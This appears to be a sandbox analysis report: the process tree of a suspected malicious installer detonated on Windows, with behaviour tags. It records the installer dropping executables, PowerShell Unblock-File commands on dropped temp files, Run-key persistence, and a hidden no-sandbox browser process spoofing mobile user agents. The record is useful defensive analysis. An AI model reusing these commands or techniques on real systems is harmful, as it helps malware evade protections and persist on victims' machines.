"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
2⤵
PID:1912
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
2⤵
PID:2488
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2084
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
2⤵
PID:3184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6476 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6048
-
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5168
-
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4048
-
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4056
-
C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe
"C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"
1⤵
PID:4000
-
C:\Users\Admin\AppData\Local\Temp\is-TTMLS.tmp\setup_34Uv1hLE7B.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TTMLS.tmp\setup_34Uv1hLE7B.tmp" /SL5="$7020E,6120275,56832,C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6088
-
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
3⤵
PID:5240
-
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 1711397ec0a91dd980a7244b5bb3ba84
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5828
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 844
4⤵
- Program crash
PID:960
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 852
4⤵
- Program crash
PID:3688
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 916
4⤵
- Program crash
PID:1916
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1048
4⤵
- Program crash
PID:1712
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1068
4⤵
- Program crash
PID:1184
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1052
4⤵
- Program crash
PID:4752
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1140
4⤵
- Program crash
PID:4868
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1148
4⤵
- Program crash
PID:716
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1184
4⤵
- Program crash
PID:5448
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1192
4⤵
- Program crash
PID:5516
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 968
4⤵
- Program crash
PID:1076
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1140
4⤵
- Program crash
PID:3504
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1196
4⤵
- Program crash
PID:5156
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1292
4⤵
- Program crash
PID:1868
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1196
4⤵
- Program crash
PID:5296
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1880
4⤵
- Program crash
PID:4832
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2056
4⤵
- Program crash
PID:5420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L
4⤵
PID:5576
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
5⤵
PID:4860
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1764
4⤵
- Program crash
PID:4952
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1852
4⤵
- Program crash
PID:4940
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1884
4⤵
- Program crash
PID:5672
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1816
4⤵
- Program crash
PID:4080
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1760
4⤵
- Program crash
PID:2408
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1824
4⤵
- Program crash
PID:3444
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1948
4⤵
- Program crash
PID:3436
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2056
4⤵
- Program crash
PID:5884
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2088
4⤵
- Program crash
PID:756
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1928
4⤵
- Program crash
PID:580
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2136
4⤵
- Program crash
PID:3140
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2184
4⤵
- Program crash
PID:4640
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2220
4⤵
- Program crash
PID:4212
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2204
4⤵
- Program crash
PID:1596
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2160
4⤵
- Program crash
PID:1712
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2156
4⤵
- Program crash
PID:3060
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2200
4⤵
- Program crash
PID:5752
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2216
4⤵
- Program crash
PID:1436
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2248
4⤵
- Program crash
PID:1212
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2208
4⤵
- Program crash
PID:4228
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2116
4⤵
- Program crash
PID:864
-
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"
4⤵
PID:4524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2148
4⤵
- Program crash
PID:1240
-
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe"
4⤵
PID:5540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe"
4⤵
PID:480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2132
4⤵
- Program crash
PID:5628
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1924
4⤵
- Program crash
PID:5132
-
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe /sid=3 /pid=1090
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3576
-
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2276
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Control Panel
PID:3584
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2768 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5692
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2976 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5604
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2988 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1948
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5192 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3832 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
PID:3176 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2880 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:29⤵
- Executes dropped EXE
PID:940 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:2636 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:3896 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:6048 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:240 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1264 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4064 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1076 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3648 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4488 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3984 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3572 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3808 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3768 -
